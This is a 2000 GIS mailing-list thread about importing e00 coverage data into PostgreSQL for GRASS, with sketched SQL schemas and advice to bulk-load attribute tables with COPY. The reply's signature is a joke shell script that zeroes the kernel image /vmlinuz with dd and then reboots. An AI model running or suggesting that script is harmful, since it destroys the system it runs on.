Implementation in Postgres

Having looked at the description of the PostgreSQL interface to GRASS, I
am convinced that it would let me do what I'm trying to do. The only
question now is how to get the data I have into a Postgres database,
whether from what has already been loaded into GRASS in the standard
way or directly from the e00 file.

Is there a standard utility which will convert GRASS's dig-format data
into Postgres tables? If not, is there an existing utility for importing
e00 files into Postgres? Barring either of those, I would need to do it
myself, which would require some knowledge of the schema that GRASS
expects to find when accessing the data.

If I were to produce the database myself, my planned schema would be one
table for each of polygons, lines, and nodes, with views for each
coverage (Arc/INFO terminology here). In addition, I would have tables
for displays and projects which would not hold any fundamental data but
would make it easier to redraw the maps after each change.

The field names and types of the three data tables would be as follows:

Polygons
  Coverage:varchar, PolyID:char, PolyN:char, Bounds:box,
  numArcs:int, arcIDs:char, reversed:boolean, nodeIDs:char,
  polyIDs:char, area:float, perimeter:float, centroid:point
Lines
  Coverage:varchar, LineID:char, LineN:char, fNode:char,
  tNode:char, lPoly:char, rPoly:char, arcPath:path, length:float
Nodes
  Coverage:varchar, NodeID:char, NodeN:char, Pos:point
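
In PostgreSQL terms, I imagine the three tables would be declared roughly
like this (only a sketch -- the types follow the listing above, except
that I have used varchar for the ID and ID-list columns, since a bare
char would only hold a single character):

  -- one row per polygon, across all coverages
  CREATE TABLE polygons (
      coverage   varchar,     -- coverage the feature belongs to
      polyid     varchar,     -- internal polygon ID
      polyn      varchar,     -- user feature ID
      bounds     box,         -- bounding box of the polygon
      numarcs    int,         -- number of arcs forming the boundary
      arcids     varchar,     -- delimited list of boundary arc IDs
      reversed   boolean,     -- arc direction flag
      nodeids    varchar,     -- delimited list of node IDs
      polyids    varchar,     -- delimited list of adjacent polygon IDs
      area       float,
      perimeter  float,
      centroid   point
  );

  -- one row per arc/line
  CREATE TABLE lines (
      coverage   varchar,
      lineid     varchar,     -- internal line ID
      linen      varchar,     -- user feature ID
      fnode      varchar,     -- from-node
      tnode      varchar,     -- to-node
      lpoly      varchar,     -- polygon to the left
      rpoly      varchar,     -- polygon to the right
      arcpath    path,        -- the vertex string itself
      length     float
  );

  -- one row per node
  CREATE TABLE nodes (
      coverage   varchar,
      nodeid     varchar,
      noden      varchar,
      pos        point
  );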

In addition, various coverages would have their own base tables
containing data specific to that coverage. For instance, roads would
have fields for functional class, route number, and so on. A side
benefit of this approach is that it would permit various analyses, such
as aggregations, to be performed by the database that would otherwise
have to be done manually.
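
To make the roads example concrete (the column names below are invented,
purely to show the idea), the coverage-specific table and a
database-side aggregation might look like:

  -- hypothetical attribute table for the roads coverage;
  -- linen joins back to lines.linen
  CREATE TABLE roads (
      linen       varchar,
      func_class  int,        -- functional class
      route_num   varchar     -- route number
  );

  -- total road length per functional class, computed by the database
  -- rather than by hand
  SELECT r.func_class, sum(l.length) AS total_length
  FROM   lines l, roads r
  WHERE  l.coverage = 'roads'
    AND  l.linen = r.linen
  GROUP  BY r.func_class;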

These fields are based on what I read about the format of e00 files and
should therefore contain everything that is available to describe each
coverage. The question is what structure the views should take so that,
when the GRASS modules query them thinking they are ordinary tables,
they find what they expect. I would welcome pointers to the relevant
functions and files in the source.
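
As a sketch only -- since I don't yet know what layout the modules
actually expect -- a per-coverage view over the generic lines table
might be something like:

  -- one view per coverage; whether the column names and structure
  -- match what the GRASS modules look for is exactly the open question
  CREATE VIEW roads_lines AS
      SELECT lineid, linen, fnode, tnode, lpoly, rpoly, arcpath, length
      FROM   lines
      WHERE  coverage = 'roads';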

On a separate note, I was looking through the e00 files and noticed that
there were several instances where multiple features (lines, polygons)
had the same feature-ID. Would importing with the -i flag under such
circumstances explain the problems I've been having with duplicates?

Scott Smith

On Wed, Jun 28, 2000 at 07:20:55PM -0400, Scott Smith wrote:

> Having looked at the description of the PostgreSQL interface to GRASS, I
> am convinced that it would let me do what I'm trying to do. The only
> question now is how to get the data I have into a Postgres database,
> whether from what has already been loaded into GRASS in the standard
> way or directly from the e00 file.

The easiest way would be to go back to Arc/Info and export all of your
attribute tables as some sort of delimited file, so you'd have foo.aat,
foo.pat, foo.nat, etc. Then create a table for each one in PostgreSQL
and use the COPY command to import them. The GRASS interface is for the
attribute data -- not the spatial/topological data. It's somewhat
difficult to represent topological spatial data in a relational database
(it requires several cross-referenced tables and can get messy).
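
Something roughly like this, assuming foo.aat was exported tab-delimited
with the usual AAT items (adjust the columns to whatever is actually in
your export):

  -- table matching the columns of the exported foo.aat
  CREATE TABLE foo_aat (
      fnode     int,
      tnode     int,
      lpoly     int,
      rpoly     int,
      length    float,
      foo_      int,      -- the cover# item (internal ID)
      foo_id    int       -- the cover-id item (user ID)
  );

  -- bulk-load the tab-delimited export
  COPY foo_aat FROM '/tmp/foo_aat.txt';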

AFAIK, GRASS doesn't have any idea about things like regions, routes and
dynamic segmentation -- so those issues come up as well. Its strength
is in raster/cell-based analysis and modelling.

Anywho, if you're really interested in pursuing a PostgreSQL GIS type
thingy, I've been fiddling with various approaches over the last month
or two. If the data models ever stabilize, I'll patch together some
import/export routines for GRASS. I figure GRASS is a good place to
develop data and do analysis, but PostgreSQL can be an appropriate place
for publishing queryable data -- say for online applications where
you're more interested in a spatially enhanced database than a full GIS
environment.
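
For example, even without real topology, the geometric types give you
simple window queries against tables like the ones you sketched (the
coverage name and coordinates here are made up):

  -- everything whose bounding box overlaps the current map window,
  -- using the standard && overlap operator on the box type
  SELECT polyn, area
  FROM   polygons
  WHERE  coverage = 'soils'
    AND  bounds && box '((550000,4800000),(560000,4810000))';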

--
#! /bin/sh
echo 'Linux Must Die!' | wall
dd if=/dev/zero of=/vmlinuz bs=1 \
     count=`du -Lb /vmlinuz | awk '{ /^([0-9])+/ ; print $1 }'`
shutdown -r now